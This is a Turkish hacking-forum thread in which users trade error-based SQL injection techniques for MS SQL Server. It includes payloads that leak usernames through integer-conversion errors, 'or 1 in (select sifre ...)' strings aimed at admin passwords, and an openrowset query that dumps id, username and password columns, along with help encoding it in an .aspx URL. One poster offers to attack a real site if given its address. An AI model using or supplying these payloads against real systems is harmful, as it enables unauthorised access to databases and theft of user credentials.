folder Tahribat.com Forumları
linefolder Web sitesi Güvenliği, DOS - DDOS Saldırıları...
linefolder Sql İnjectiondan Anlayan Arkdaslar Acil Yardim



Sql İnjectiondan Anlayan Arkdaslar Acil Yardim

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    geniuss
    geniuss's avatar
    Kayıt Tarihi: 12/Nisan/2007
    Erkek

    Mrb arkdaslar bildiginiz gibi sql injection ile hata mesajlariyla veri okuyabiliyoruz vede kayit ilerletebiliyoruz orneyin

    id=convert(int,(select top 1 username from users where users >''a'''));

     

    ve hata mesaji olarak  

    Conversion failed when converting the varchar value 'Admin' to data type int.

    adminden sonra ki veriye ulasmak icinde

     

    id=convert(int,(select top 1 username from users where users >''Admin'''));

     

    ...

     

    ama bu sadece string tipi kolonlar icin gecerli peki ben orneyin id kolonunu okumak istedigimde nasil yapacagima dair bi fikri olan  varmi

    cunku id nin tipi int oldugu icin int inte cevirmede hata alamiyorum (bu arada string demeyin denedim o istedigim hucrenin kolonunu gostermiyor)

     

    simdiden tesekurler

     

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Twitter
    Twitter's avatar
    Kayıt Tarihi: 13/Ekim/2007
    Erkek

    Localde denemiyorsan siteyi ver yardımcı olmaya çalışalım

    yada mid veya sum fonksiyonlaı yardımcı olur

    ‘or 1 in (select sifre from kullanicilar where kulladi=’admin’)--

     

     ‘ OR in (select min(kulladi) from kullanicilar where username > ‘admin’)—


    Part Time Engineer, Full Time Dreamer ..
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    geniuss
    geniuss's avatar
    Kayıt Tarihi: 12/Nisan/2007
    Erkek

    Twitter bunu yazdı:
    -----------------------------
     

    Localde denemiyorsan siteyi ver yardımcı olmaya çalışalım

    yada mid veya sum fonksiyonlaı yardımcı olur

    ‘or 1 in (select sifre from kullanicilar where kulladi=’admin’)--

     

     ‘ OR in (select min(kulladi) from kullanicilar where username > ‘admin’)—


    -----------------------------

     

    hocam lokalde deniyorum da soyle bi sey buldum

    select * from users where  id=(select COUNT(*) from openrowset('sqloledb','server=ENIS-PC;database=Fakulteti;trusted_connection=yes;uid=badperson,pwd=badperson','SELECT CAST(CAST(id AS VARCHAR) + '', ''+ username + '', '' + CAST(password AS VARCHAR) + '', '' + CAST(Drejtimi AS VARCHAR) AS INT), 1 FROM tblUsers;'))

    SQL SERVERDE excecute dedigimde calisiyor  ve istedigim hatayi aliyorum (o tablodaki ilk satiri )  ama webden .aspx?id= olarak gonderdigimde  baska bi hata aliyorum

    Statement(s) could not be prepared.
    Incorrect syntax near ', '.

    sence sorun nedir ?

  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    geniuss
    geniuss's avatar
    Kayıt Tarihi: 12/Nisan/2007
    Erkek

    simdi fark etim browserden o stringi gonderdigimde browser + isaretini  de stringe gondermiyor boylece baska bi query olusuyor

    SELECT * FROM Produktet WHERE ID=(select COUNT(*) from openrowset('sqloledb','server=ENIS-PC;database=Fakulteti;trusted_connection=yes;uid=badperson,pwd=badperson','SELECT CAST(CAST(NrIndeksit AS VARCHAR)   '', ''  EmriMbiemri   '', ''   CAST(FJalekalimi AS VARCHAR)   '', ''   CAST(Drejtimi AS VARCHAR) AS INT), 1 FROM tblStudentat;'))

     

    hata da baska oluyor peki requeststring olarak aldigim verilerden + nasil gonderebilirim ?

  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    EnableTurk
    EnableTurk's avatar
    Kayıt Tarihi: 29/Eylül/2007
    Erkek

    Sql injection ile ilgili konu açsa birileri böyle ayrıntılı olarak anlatsa ne güzel oluurdu :D ve sonra bana pm atsa :D


    yolun açık ve aydınlık olsun ferdi baba.
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    geniuss
    geniuss's avatar
    Kayıt Tarihi: 12/Nisan/2007
    Erkek

    halettim

Toplam Hit: 2031 Toplam Mesaj: 6